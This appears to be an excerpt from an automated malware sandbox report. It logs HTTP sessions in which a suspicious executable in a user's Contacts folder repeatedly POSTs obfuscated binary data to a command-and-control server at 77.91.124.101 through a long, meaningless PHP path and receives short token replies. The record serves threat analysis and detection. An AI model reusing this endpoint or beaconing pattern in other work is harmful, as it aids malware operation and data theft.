                                                            Data Raw: 01 10 22 5d 32 01 38 58 37 30 37 1d 2b 14 2e 0e 39 3e 3e 45 28 33 22 06 27 2e 3b 02 33 29 39 51 3d 2c 3f 00 33 3a 2c 57 20 36 3f 04 2b 20 21 5a 0c 1d 26 5c 36 3b 27 54 3f 58 3c 58 29 3e 23 02 32 0f 27 5e 3c 07 33 16 34 30 38 00 26 33 28 50 2e 3f 2d 5f 2f 3b 32 0b 31 02 2d 00 23 3d 23 5f 0c 14 24 0c 21 0f 2c 00 22 23 3a 12 23 27 16 14 37 37 37 1e 33 3d 0e 55 25 06 29 1a 3c 38 0a 53 32 34 27 0d 30 14 3c 0a 25 00 23 13 3c 3a 26 54 2a 0e 2b 48 02 36 5a 50
                                                            Data Ascii: "]28X707+.9>>E(3"'.;3)9Q=,?3:,W 6?+ !Z&\6;'T?X<X)>#2'^<3408&3(P.?-_/;21-#=#_$!,"#:#'7773=U%)<8S24'0<%#<:&T*+H6ZP


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            119192.168.2.54983477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:45.470352888 CET626OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:45.667021990 CET627INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:45.667335033 CET630OUTData Raw: 57 5c 58 5c 5b 5b 5a 5d 5d 57 55 57 55 57 57 50 50 5a 58 44 56 51 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\X\[[Z]]WUWUWWPPZXDVQW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*?:R*3;Z/'.[#?R'-' T9;>^(7\8&G''^)
                                                            Nov 21, 2023 04:48:45.868627071 CET631INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            11977.91.124.10180192.168.2.549834C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:45.470352888 CET626OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:45.667021990 CET627INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:45.667335033 CET630OUTData Raw: 57 5c 58 5c 5b 5b 5a 5d 5d 57 55 57 55 57 57 50 50 5a 58 44 56 51 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W\X\[[Z]]WUWUWWPPZXDVQW_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'*?:R*3;Z/'.[#?R'-' T9;>^(7\8&G''^)
                                                            Nov 21, 2023 04:48:45.868627071 CET631INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:45 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            1277.91.124.10180192.168.2.549724C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:33.952024937 CET189OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:34.148653030 CET189INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:34.148940086 CET192OUTData Raw: 52 5b 5d 5a 5e 5d 5a 50 5d 57 55 57 55 5b 57 56 50 53 58 45 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]Z^]ZP]WUWU[WVPSXEV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_>)(2T=3#,7541)39$&W029(>+<;\->&G''^)3
                                                            Nov 21, 2023 04:47:34.355681896 CET192INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:34 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12192.168.2.54972477.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:47:33.952024937 CET189OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:47:34.148653030 CET189INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:47:34.148940086 CET192OUTData Raw: 52 5b 5d 5a 5e 5d 5a 50 5d 57 55 57 55 5b 57 56 50 53 58 45 56 5e 57 5f 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]Z^]ZP]WUWU[WVPSXEV^W_^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'_>)(2T=3#,7541)39$&W029(>+<;\->&G''^)3
                                                            Nov 21, 2023 04:47:34.355681896 CET192INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:47:34 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            120192.168.2.54983577.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:46.192867041 CET632OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:46.391906977 CET632INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:46.392203093 CET634OUTData Raw: 57 51 58 5a 5e 5a 5a 51 5d 57 55 57 55 57 57 52 50 5a 58 43 56 54 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQXZ^ZZQ]WUWUWWRPZXCVTWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>>?>>#[.'%4:+>3>:W33>T-;*_<<',&G''^)
                                                            Nov 21, 2023 04:48:46.595650911 CET635INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:46 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12077.91.124.10180192.168.2.549835C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:46.192867041 CET632OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Nov 21, 2023 04:48:46.391906977 CET632INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:46.392203093 CET634OUTData Raw: 57 51 58 5a 5e 5a 5a 51 5d 57 55 57 55 57 57 52 50 5a 58 43 56 54 57 59 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: WQXZ^ZZQ]WUWUWWRPZXCVTWY^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'>>?>>#[.'%4:+>3>:W33>T-;*_<<',&G''^)
                                                            Nov 21, 2023 04:48:46.595650911 CET635INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:46 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            121192.168.2.54983677.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:46.908144951 CET635OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:47.105767965 CET636INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:47.105983019 CET638OUTData Raw: 57 5f 58 5f 5b 5a 5f 5a 5d 57 55 57 55 5a 57 56 50 5f 58 49 56 50 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_X_[Z_Z]WUWUZWVP_XIVPWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)2+]&S*3+\.$1#=_)#S$>W03:V:8&^(#];&G''^)7
                                                            Nov 21, 2023 04:48:47.308711052 CET638INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:46 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12177.91.124.10180192.168.2.549836C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:46.908144951 CET635OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:47.105767965 CET636INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:47.105983019 CET638OUTData Raw: 57 5f 58 5f 5b 5a 5f 5a 5d 57 55 57 55 5a 57 56 50 5f 58 49 56 50 57 52 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W_X_[Z_Z]WUWUZWVP_XIVPWR^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$)2+]&S*3+\.$1#=_)#S$>W03:V:8&^(#];&G''^)7
                                                            Nov 21, 2023 04:48:47.308711052 CET638INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:46 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12277.91.124.10180192.168.2.549837C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:47.629125118 CET639OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:47.828713894 CET639INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:47.828972101 CET642OUTData Raw: 52 5b 5d 5a 5b 53 5a 5b 5d 57 55 57 55 5e 57 55 50 5a 58 47 56 50 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]Z[SZ[]WUWU^WUPZXGVPWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=;*<> 7,B9#*6(0&Q'S-9<]/>&G''^)?
                                                            Nov 21, 2023 04:48:48.033458948 CET642INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:47 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            122192.168.2.54983777.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:47.629125118 CET639OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:47.828713894 CET639INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:47.828972101 CET642OUTData Raw: 52 5b 5d 5a 5b 53 5a 5b 5d 57 55 57 55 5e 57 55 50 5a 58 47 56 50 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R[]Z[SZ[]WUWU^WUPZXGVPWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$=;*<> 7,B9#*6(0&Q'S-9<]/>&G''^)?
                                                            Nov 21, 2023 04:48:48.033458948 CET642INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:47 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            12377.91.124.10180192.168.2.549838C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:48.348392010 CET643OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:48.545490980 CET643INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:48.545708895 CET646OUTData Raw: 52 5d 5d 5d 5b 53 5f 59 5d 57 55 57 55 5c 57 52 50 59 58 41 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]][S_Y]WUWU\WRPYXAVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*^?;1>30/4&#)"<3-'.1$0!.->,<,&G''^)/
                                                            Nov 21, 2023 04:48:48.747749090 CET646INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:48 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            123192.168.2.54983877.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:48.348392010 CET643OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2544
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:48.545490980 CET643INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:48.545708895 CET646OUTData Raw: 52 5d 5d 5d 5b 53 5f 59 5d 57 55 57 55 5c 57 52 50 59 58 41 56 56 57 53 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: R]]][S_Y]WUWU\WRPYXAVVWS^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\$*^?;1>30/4&#)"<3-'.1$0!.->,<,&G''^)/
                                                            Nov 21, 2023 04:48:48.747749090 CET646INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:48 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                            124192.168.2.54983977.91.124.10180C:\Users\user\Contacts\qBJICEqiLNwXNBLrN.exe
                                                            TimestampkBytes transferredDirectionData
                                                            Nov 21, 2023 04:48:49.065499067 CET647OUTPOST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1
                                                            Content-Type: application/octet-stream
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                            Host: 77.91.124.101
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Nov 21, 2023 04:48:49.267235994 CET647INHTTP/1.1 100 Continue
                                                            Nov 21, 2023 04:48:49.267549038 CET650OUTData Raw: 57 5b 58 5e 5b 5c 5f 59 5d 57 55 57 55 5e 57 50 50 59 58 42 56 57 57 5a 5e 58 42 5f 5a 58 5b 59 41 5e 5f 5b 59 58 53 56 58 53 5a 51 57 56 5e 5e 5a 51 5c 5a 59 5d 59 52 55 5f 5f 5a 50 58 56 56 5b 50 59 59 50 5b 55 55 58 56 59 58 58 52 47 53 52 5e
                                                            Data Ascii: W[X^[\_Y]WUWU^WPPYXBVWWZ^XB_ZX[YA^_[YXSVXSZQWV^^ZQ\ZY]YRU__ZPXVV[PYYP[UUXVYXXRGSR^R[SYTD[YT^[XYYZ]XQZVY^[RXU_TB[[CQRZZVR^^^[V_ZT^U^WZVPT^YPQP\\TPTRERXY_FYXZ\\^W_P]Y^[ZR\_VTT^Y_^\[UF[S\'^*1^(+9*07;$] 9+3&>:S33%.>?<8.&G''^)+
                                                            Nov 21, 2023 04:48:49.470273018 CET650INHTTP/1.1 200 OK
                                                            Date: Tue, 21 Nov 2023 03:48:49 GMT
                                                            Server: Apache/2.4.41 (Ubuntu)
                                                            Content-Length: 4
                                                            Keep-Alive: timeout=5, max=100
                                                            Connection: Keep-Alive
                                                            Content-Type: text/html; charset=UTF-8
                                                            Data Raw: 33 58 5b 55
                                                            Data Ascii: 3X[U


                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
